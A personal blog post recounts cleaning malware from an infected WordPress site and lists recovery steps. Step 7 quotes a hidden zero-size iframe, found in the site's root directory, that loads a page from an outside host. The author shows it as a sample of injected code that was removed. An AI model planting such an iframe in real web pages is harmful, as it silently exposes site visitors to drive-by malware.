How to Remove malware from website

malwareAt morning with some cup of tea I stand in front of my laptop to check my website. I try to login into the admin panel. Certainly I got the message the malware has been detected in my website. The website hasn’t got any problem before I went to sleep.  I was astound by looking at this message. I haven’t face this sort of problem before. I thought the problem is just simple and will sorted out simply by contact hosting company for support. This problem has been faced in the same blog you are reading just couple of days before. I am using WordPress to build my blog and using Justhost webhosting services.

I try talk with online support but I didn’t get relevant answer from them. They urge me to request a ticket for it.  I request a ticket with my problem and get the following answer from the hosting company.

Please open your website and go to ‘Why my website was blocked’. You will have to follow Google instructions to have your website unblocked. Then you will have to wait until your site is re-indexed by Google. Unfortunately, it is beyond our capability to settle this issue.

justhost-notice

 

Now the problem occurs as I have to solve my problem all by myself. This problem new to me. I Though it was quite easy just to restore the back that I have. Since I backup my blog daily its not a big problem for me. But when I check my other website that I was hosting on same account. All the website has been infected. Now the problem seems more complicated. Since I don’t have backup available for all my website. I just have only one option left and the option is not that simple I myself have to understand about the problem and find the necessary solution of it.  Therefore I have follow the necessary steps  that could be essential for you to eradicate this problem. Please note that the vulnerability and nature of malware defers from website to website.

1. Log in into Google webmaster and Find the problem root cause.

Google Website has one of good option to demonstrate the information about the malware. This is very useful in this situation. After logging into your account and choosing your domain name(if you have added my domain in webmaster account) You will be notify about the malware of page that it has infected. The first step that you should take is to find out the root cause of the problem.

In my case. Three post including the main page has been detected and other numerous website has been effective hosting on same domain.

2. Change everything password of your Cpanel , ftp account, database

To ensure that any hackers is trying to hack your website. Its always a good idea to change the password of everything. Please note that hackers are not always the case to spread malware.

3. Talk with your webhosting company.

Its always the good ideal to tell what’s happen to your hosting company. In most case webhosting company seems supportive. Mention your problem with full description so that they can help. If you hosting company refuse to help you like mine. All you need to do is find out the solution of your problem yourself. However if you know the exact time when the problem was likely to be seen in your website. You can ask hosting company to restore your data from their backup to the earlier period of malware detection.

4. Malicious File

In most case the hacker try to to include some malicious script that will redirect all the user or website visitor to different website that contains malware. The file can be injected by an hackers in different ways. Sometimes it can be into files on your webserver. In my case. In have found two file in public_html(web root where all file has been stored). that’s in the main pages. Its easier for to to find it out because I am using wordpress and there shouldn’t be any javascript file in the main root directory. I have found two different file with bundle of script on it. Please note that the hacker sometimes only inject a pointer to .js

5. Redirection in .htaccess file

.htaccess file is the major tools used by hackers. Hackers modify the .htaccess file and redirect your user to other website. In my case there is no any .htaccess modification

You can find more about .htaaccess attack from this pages

6. Ensure that you computer is malware free.

As you probably know your login info can be taken from your browser’s cache by some virus, then credentials to access your hosting account can be delivered and used by somebody else. So, the most vulnerable place can be your own PC and I do advise you to have some good anti-virus software.

7.  Script under hidden I frame.

Iframe is another way to inject malware in your website. Iframe know and inline frame  is a certain section of webpages that loads content from another webpages.  I have found iframe in root directory and remove it.

<iframe src="http://somewebsite.info/in.php width=0 height=0 frameborder-0" width="320" height="240"></iframe>

Final Step: Patience is the most important things if you are facing this problem. Google will take at least a day to recheck your website and remove warning from you website. When you feel you have done all necessary things you can request for your malware review via Google webmaster tools.  Please note that it tooks 2 days for me for the removal of malware warning from Google.

Resources to Scan your website.

Wpmalwares provide complete wordpress malware removal service. If you have wordpress website you can try their service.

0saves
Posted in Security | Tagged , , , , | 3 Comments

3 Responses to How to Remove malware from website

  1. Kumar UNITED STATES Mozilla Firefox Windows says:

    i have similar issues on my website. can you please let me know how you found “Script under hidden I frame” Thanks for posting a great article.

    • saugat Google Chrome Windows says:

      Hello I have already delete script under Iframe. I just found Iframe by checking each individual file that I have doubt. You can check out the tools may be that helps to find the malware . If it doesn’t you have to figure it out yourself.

  2. Pingback: WordPress Arena: A Blog for WordPress Developers, Designers and Blogger WordPress

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>